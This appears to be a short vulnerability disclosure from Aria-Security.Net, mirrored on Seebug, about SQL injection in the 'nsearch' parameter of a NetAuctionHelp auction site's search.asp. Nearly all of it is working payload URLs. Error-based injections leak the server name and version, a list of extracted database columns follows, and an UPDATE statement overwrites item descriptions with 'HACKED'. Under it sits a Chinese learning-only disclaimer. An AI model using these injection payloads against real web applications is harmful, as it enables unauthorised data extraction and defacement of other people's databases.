Aria-Security Net http://Aria-Security.Net ------------------------ Vendor: http://www.netauctionhelp.com PoC: search.asp ?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)-- tblAd.id tblAd.aspectratio tblAd.title tblAd.imagepath tblAd.startdate tblAd.enddate tblAd.id_seller tblAd.descr -1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');-- this code with update itemdetl.asp?id=1 Credit goes to Aria-Security.Net Greetz: AurA
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论